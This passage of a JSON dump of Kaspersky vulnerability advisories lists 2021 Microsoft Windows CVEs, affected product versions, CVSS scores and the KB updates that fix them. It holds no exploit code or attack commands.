Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005090](<http://support.microsoft.com/kb/5005090>) \n[5005089](<http://support.microsoft.com/kb/5005089>) \n[5005036](<http://support.microsoft.com/kb/5005036>) 
\n[5005095](<http://support.microsoft.com/kb/5005095>) \n[5005088](<http://support.microsoft.com/kb/5005088>) \n[5011525](<http://support.microsoft.com/kb/5011525>) \n[5011534](<http://support.microsoft.com/kb/5011534>) \n[5011552](<http://support.microsoft.com/kb/5011552>) \n[5011529](<http://support.microsoft.com/kb/5011529>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12250 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-03-09T00:00:00", "id": "KLA12250", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12250/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-28T14:22:25", "description": "### *Detect date*:\n11/09/2021\n\n### 
*Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 8.1 for 32-bit systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for 
x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nRemote Desktop client for Windows Desktop \nWindows 10 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-42282](<https://nvd.nist.gov/vuln/detail/CVE-2021-42282>) \n[CVE-2021-41367](<https://nvd.nist.gov/vuln/detail/CVE-2021-41367>) \n[CVE-2021-41371](<https://nvd.nist.gov/vuln/detail/CVE-2021-41371>) \n[CVE-2021-38665](<https://nvd.nist.gov/vuln/detail/CVE-2021-38665>) \n[CVE-2021-38666](<https://nvd.nist.gov/vuln/detail/CVE-2021-38666>) \n[CVE-2021-42291](<https://nvd.nist.gov/vuln/detail/CVE-2021-42291>) \n[CVE-2021-42278](<https://nvd.nist.gov/vuln/detail/CVE-2021-42278>) \n[CVE-2021-41377](<https://nvd.nist.gov/vuln/detail/CVE-2021-41377>) \n[CVE-2021-41379](<https://nvd.nist.gov/vuln/detail/CVE-2021-41379>) \n[CVE-2021-42285](<https://nvd.nist.gov/vuln/detail/CVE-2021-42285>) \n[CVE-2021-42283](<https://nvd.nist.gov/vuln/detail/CVE-2021-42283>) \n[CVE-2021-42275](<https://nvd.nist.gov/vuln/detail/CVE-2021-42275>) \n[CVE-2021-38631](<https://nvd.nist.gov/vuln/detail/CVE-2021-38631>) \n[CVE-2021-41370](<https://nvd.nist.gov/vuln/detail/CVE-2021-41370>) \n[CVE-2021-42287](<https://nvd.nist.gov/vuln/detail/CVE-2021-42287>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-42282](<https://vulners.com/cve/CVE-2021-42282>)6.5High \n[CVE-2021-41367](<https://vulners.com/cve/CVE-2021-41367>)4.6Warning 
\n[CVE-2021-41371](<https://vulners.com/cve/CVE-2021-41371>)2.1Warning \n[CVE-2021-38665](<https://vulners.com/cve/CVE-2021-38665>)4.3Warning \n[CVE-2021-38666](<https://vulners.com/cve/CVE-2021-38666>)6.8High \n[CVE-2021-42291](<https://vulners.com/cve/CVE-2021-42291>)6.5High \n[CVE-2021-42278](<https://vulners.com/cve/CVE-2021-42278>)6.5High \n[CVE-2021-41377](<https://vulners.com/cve/CVE-2021-41377>)4.6Warning \n[CVE-2021-41379](<https://vulners.com/cve/CVE-2021-41379>)4.6Warning \n[CVE-2021-42285](<https://vulners.com/cve/CVE-2021-42285>)7.2High \n[CVE-2021-42283](<https://vulners.com/cve/CVE-2021-42283>)4.6Warning \n[CVE-2021-42275](<https://vulners.com/cve/CVE-2021-42275>)6.5High \n[CVE-2021-38631](<https://vulners.com/cve/CVE-2021-38631>)2.1Warning \n[CVE-2021-41370](<https://vulners.com/cve/CVE-2021-41370>)4.6Warning \n[CVE-2021-42287](<https://vulners.com/cve/CVE-2021-42287>)6.5High\n\n### *KB list*:\n[5007233](<http://support.microsoft.com/kb/5007233>) \n[5007236](<http://support.microsoft.com/kb/5007236>) \n[5007263](<http://support.microsoft.com/kb/5007263>) \n[5007246](<http://support.microsoft.com/kb/5007246>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12341 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2023-09-28T00:00:00", "id": "KLA12341", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12341/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T15:07:08", "description": "### *Detect date*:\n02/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 
1803 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows RT 8.1 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-24080](<https://nvd.nist.gov/vuln/detail/CVE-2021-24080>) \n[CVE-2021-24103](<https://nvd.nist.gov/vuln/detail/CVE-2021-24103>) \n[CVE-2021-24093](<https://nvd.nist.gov/vuln/detail/CVE-2021-24093>) \n[CVE-2021-1734](<https://nvd.nist.gov/vuln/detail/CVE-2021-1734>) \n[CVE-2021-25195](<https://nvd.nist.gov/vuln/detail/CVE-2021-25195>) \n[CVE-2021-24086](<https://nvd.nist.gov/vuln/detail/CVE-2021-24086>) 
\n[CVE-2021-1727](<https://nvd.nist.gov/vuln/detail/CVE-2021-1727>) \n[CVE-2021-24102](<https://nvd.nist.gov/vuln/detail/CVE-2021-24102>) \n[CVE-2021-24094](<https://nvd.nist.gov/vuln/detail/CVE-2021-24094>) \n[CVE-2021-24076](<https://nvd.nist.gov/vuln/detail/CVE-2021-24076>) \n[CVE-2021-24078](<https://nvd.nist.gov/vuln/detail/CVE-2021-24078>) \n[CVE-2021-24084](<https://nvd.nist.gov/vuln/detail/CVE-2021-24084>) \n[CVE-2021-24075](<https://nvd.nist.gov/vuln/detail/CVE-2021-24075>) \n[CVE-2021-24082](<https://nvd.nist.gov/vuln/detail/CVE-2021-24082>) \n[CVE-2021-1731](<https://nvd.nist.gov/vuln/detail/CVE-2021-1731>) \n[CVE-2021-24083](<https://nvd.nist.gov/vuln/detail/CVE-2021-24083>) \n[CVE-2021-24079](<https://nvd.nist.gov/vuln/detail/CVE-2021-24079>) \n[CVE-2021-24096](<https://nvd.nist.gov/vuln/detail/CVE-2021-24096>) \n[CVE-2021-1722](<https://nvd.nist.gov/vuln/detail/CVE-2021-1722>) \n[CVE-2021-24098](<https://nvd.nist.gov/vuln/detail/CVE-2021-24098>) \n[CVE-2021-24074](<https://nvd.nist.gov/vuln/detail/CVE-2021-24074>) \n[CVE-2021-24088](<https://nvd.nist.gov/vuln/detail/CVE-2021-24088>) \n[CVE-2021-24081](<https://nvd.nist.gov/vuln/detail/CVE-2021-24081>) \n[CVE-2021-24077](<https://nvd.nist.gov/vuln/detail/CVE-2021-24077>) \n[CVE-2021-1698](<https://nvd.nist.gov/vuln/detail/CVE-2021-1698>) \n[CVE-2021-24106](<https://nvd.nist.gov/vuln/detail/CVE-2021-24106>) \n[CVE-2021-1732](<https://nvd.nist.gov/vuln/detail/CVE-2021-1732>) \n[CVE-2021-24091](<https://nvd.nist.gov/vuln/detail/CVE-2021-24091>) \n[CVE-2020-17162](<https://nvd.nist.gov/vuln/detail/CVE-2020-17162>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-24080](<https://vulners.com/cve/CVE-2021-24080>)4.3Warning \n[CVE-2021-24103](<https://vulners.com/cve/CVE-2021-24103>)4.6Warning \n[CVE-2021-24093](<https://vulners.com/cve/CVE-2021-24093>)6.8High 
\n[CVE-2021-1734](<https://vulners.com/cve/CVE-2021-1734>)5.0Warning \n[CVE-2021-25195](<https://vulners.com/cve/CVE-2021-25195>)4.6Warning \n[CVE-2021-24086](<https://vulners.com/cve/CVE-2021-24086>)5.0Warning \n[CVE-2021-1727](<https://vulners.com/cve/CVE-2021-1727>)4.6Warning \n[CVE-2021-24102](<https://vulners.com/cve/CVE-2021-24102>)4.6Warning \n[CVE-2021-24094](<https://vulners.com/cve/CVE-2021-24094>)7.5Critical \n[CVE-2021-24076](<https://vulners.com/cve/CVE-2021-24076>)2.1Warning \n[CVE-2021-24078](<https://vulners.com/cve/CVE-2021-24078>)7.5Critical \n[CVE-2021-24084](<https://vulners.com/cve/CVE-2021-24084>)4.9Warning \n[CVE-2021-24075](<https://vulners.com/cve/CVE-2021-24075>)3.5Warning \n[CVE-2021-24082](<https://vulners.com/cve/CVE-2021-24082>)4.0Warning \n[CVE-2021-1731](<https://vulners.com/cve/CVE-2021-1731>)2.1Warning \n[CVE-2021-24083](<https://vulners.com/cve/CVE-2021-24083>)6.8High \n[CVE-2021-24079](<https://vulners.com/cve/CVE-2021-24079>)2.1Warning \n[CVE-2021-24096](<https://vulners.com/cve/CVE-2021-24096>)4.6Warning \n[CVE-2021-1722](<https://vulners.com/cve/CVE-2021-1722>)7.5Critical \n[CVE-2021-24098](<https://vulners.com/cve/CVE-2021-24098>)2.1Warning \n[CVE-2021-24074](<https://vulners.com/cve/CVE-2021-24074>)7.5Critical \n[CVE-2021-24088](<https://vulners.com/cve/CVE-2021-24088>)6.5High \n[CVE-2021-24081](<https://vulners.com/cve/CVE-2021-24081>)6.8High \n[CVE-2021-24077](<https://vulners.com/cve/CVE-2021-24077>)7.5Critical \n[CVE-2021-1698](<https://vulners.com/cve/CVE-2021-1698>)4.6Warning \n[CVE-2021-24106](<https://vulners.com/cve/CVE-2021-24106>)2.1Warning \n[CVE-2021-1732](<https://vulners.com/cve/CVE-2021-1732>)4.6Warning \n[CVE-2021-24091](<https://vulners.com/cve/CVE-2021-24091>)6.8High \n[CVE-2020-17162](<https://vulners.com/cve/CVE-2020-17162>)6.5High\n\n### *KB list*:\n[4577048](<http://support.microsoft.com/kb/4577048>) \n[4571756](<http://support.microsoft.com/kb/4571756>) 
\n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4577032](<http://support.microsoft.com/kb/4577032>) \n[4577049](<http://support.microsoft.com/kb/4577049>) \n[4577015](<http://support.microsoft.com/kb/4577015>) \n[4577066](<http://support.microsoft.com/kb/4577066>) \n[4574727](<http://support.microsoft.com/kb/4574727>) \n[4577071](<http://support.microsoft.com/kb/4577071>) \n[4577038](<http://support.microsoft.com/kb/4577038>) \n[4601354](<http://support.microsoft.com/kb/4601354>) \n[4601319](<http://support.microsoft.com/kb/4601319>) \n[4601315](<http://support.microsoft.com/kb/4601315>) \n[4601345](<http://support.microsoft.com/kb/4601345>) \n[4601357](<http://support.microsoft.com/kb/4601357>) \n[4601348](<http://support.microsoft.com/kb/4601348>) \n[4601318](<http://support.microsoft.com/kb/4601318>) \n[4601384](<http://support.microsoft.com/kb/4601384>) \n[4601349](<http://support.microsoft.com/kb/4601349>) \n[4601331](<http://support.microsoft.com/kb/4601331>) \n[5008218](<http://support.microsoft.com/kb/5008218>) \n[5008206](<http://support.microsoft.com/kb/5008206>) \n[5008212](<http://support.microsoft.com/kb/5008212>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "kaspersky", "title": "KLA12071 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17162", "CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-09-28T00:00:00", "id": "KLA12071", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12071/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-28T14:21:07", "description": "### *Detect date*:\n11/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 8.1 for 32-bit systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core 
installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-41367](<https://nvd.nist.gov/vuln/detail/CVE-2021-41367>) \n[CVE-2021-38665](<https://nvd.nist.gov/vuln/detail/CVE-2021-38665>) \n[CVE-2021-26443](<https://nvd.nist.gov/vuln/detail/CVE-2021-26443>) \n[CVE-2021-38666](<https://nvd.nist.gov/vuln/detail/CVE-2021-38666>) \n[CVE-2021-42291](<https://nvd.nist.gov/vuln/detail/CVE-2021-42291>) \n[CVE-2021-42280](<https://nvd.nist.gov/vuln/detail/CVE-2021-42280>) \n[CVE-2021-42288](<https://nvd.nist.gov/vuln/detail/CVE-2021-42288>) \n[CVE-2021-41377](<https://nvd.nist.gov/vuln/detail/CVE-2021-41377>) \n[CVE-2021-42276](<https://nvd.nist.gov/vuln/detail/CVE-2021-42276>) \n[CVE-2021-42278](<https://nvd.nist.gov/vuln/detail/CVE-2021-42278>) \n[CVE-2021-36957](<https://nvd.nist.gov/vuln/detail/CVE-2021-36957>) \n[CVE-2021-42285](<https://nvd.nist.gov/vuln/detail/CVE-2021-42285>) \n[CVE-2021-42283](<https://nvd.nist.gov/vuln/detail/CVE-2021-42283>) \n[CVE-2021-42279](<https://nvd.nist.gov/vuln/detail/CVE-2021-42279>) \n[CVE-2021-38631](<https://nvd.nist.gov/vuln/detail/CVE-2021-38631>) \n[CVE-2021-42287](<https://nvd.nist.gov/vuln/detail/CVE-2021-42287>) \n[CVE-2021-42284](<https://nvd.nist.gov/vuln/detail/CVE-2021-42284>) \n[CVE-2021-42282](<https://nvd.nist.gov/vuln/detail/CVE-2021-42282>) \n[CVE-2021-42286](<https://nvd.nist.gov/vuln/detail/CVE-2021-42286>) \n[CVE-2021-41371](<https://nvd.nist.gov/vuln/detail/CVE-2021-41371>) \n[CVE-2021-42274](<https://nvd.nist.gov/vuln/detail/CVE-2021-42274>) 
\n[CVE-2021-42277](<https://nvd.nist.gov/vuln/detail/CVE-2021-42277>) \n[CVE-2021-41379](<https://nvd.nist.gov/vuln/detail/CVE-2021-41379>) \n[CVE-2021-41378](<https://nvd.nist.gov/vuln/detail/CVE-2021-41378>) \n[CVE-2021-41356](<https://nvd.nist.gov/vuln/detail/CVE-2021-41356>) \n[CVE-2021-42275](<https://nvd.nist.gov/vuln/detail/CVE-2021-42275>) \n[CVE-2021-41366](<https://nvd.nist.gov/vuln/detail/CVE-2021-41366>) \n[CVE-2021-41370](<https://nvd.nist.gov/vuln/detail/CVE-2021-41370>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2021-42282](<https://vulners.com/cve/CVE-2021-42282>)6.5High \n[CVE-2021-41367](<https://vulners.com/cve/CVE-2021-41367>)4.6Warning \n[CVE-2021-41371](<https://vulners.com/cve/CVE-2021-41371>)2.1Warning \n[CVE-2021-38665](<https://vulners.com/cve/CVE-2021-38665>)4.3Warning \n[CVE-2021-38666](<https://vulners.com/cve/CVE-2021-38666>)6.8High \n[CVE-2021-42291](<https://vulners.com/cve/CVE-2021-42291>)6.5High \n[CVE-2021-42278](<https://vulners.com/cve/CVE-2021-42278>)6.5High \n[CVE-2021-41377](<https://vulners.com/cve/CVE-2021-41377>)4.6Warning \n[CVE-2021-41379](<https://vulners.com/cve/CVE-2021-41379>)4.6Warning \n[CVE-2021-42285](<https://vulners.com/cve/CVE-2021-42285>)7.2High \n[CVE-2021-42283](<https://vulners.com/cve/CVE-2021-42283>)4.6Warning \n[CVE-2021-42275](<https://vulners.com/cve/CVE-2021-42275>)6.5High \n[CVE-2021-38631](<https://vulners.com/cve/CVE-2021-38631>)2.1Warning \n[CVE-2021-41370](<https://vulners.com/cve/CVE-2021-41370>)4.6Warning \n[CVE-2021-42287](<https://vulners.com/cve/CVE-2021-42287>)6.5High \n[CVE-2021-26443](<https://vulners.com/cve/CVE-2021-26443>)7.7Critical \n[CVE-2021-42280](<https://vulners.com/cve/CVE-2021-42280>)4.6Warning \n[CVE-2021-42288](<https://vulners.com/cve/CVE-2021-42288>)3.6Warning \n[CVE-2021-42276](<https://vulners.com/cve/CVE-2021-42276>)6.8High 
\n[CVE-2021-36957](<https://vulners.com/cve/CVE-2021-36957>)4.6Warning \n[CVE-2021-42279](<https://vulners.com/cve/CVE-2021-42279>)5.1High \n[CVE-2021-42284](<https://vulners.com/cve/CVE-2021-42284>)7.1High \n[CVE-2021-42286](<https://vulners.com/cve/CVE-2021-42286>)4.6Warning \n[CVE-2021-42274](<https://vulners.com/cve/CVE-2021-42274>)2.1Warning \n[CVE-2021-42277](<https://vulners.com/cve/CVE-2021-42277>)4.6Warning \n[CVE-2021-41378](<https://vulners.com/cve/CVE-2021-41378>)6.5High \n[CVE-2021-41356](<https://vulners.com/cve/CVE-2021-41356>)5.0Warning \n[CVE-2021-41366](<https://vulners.com/cve/CVE-2021-41366>)4.6Warning\n\n### *KB list*:\n[5007260](<http://support.microsoft.com/kb/5007260>) \n[5007255](<http://support.microsoft.com/kb/5007255>) \n[5007206](<http://support.microsoft.com/kb/5007206>) \n[5007207](<http://support.microsoft.com/kb/5007207>) 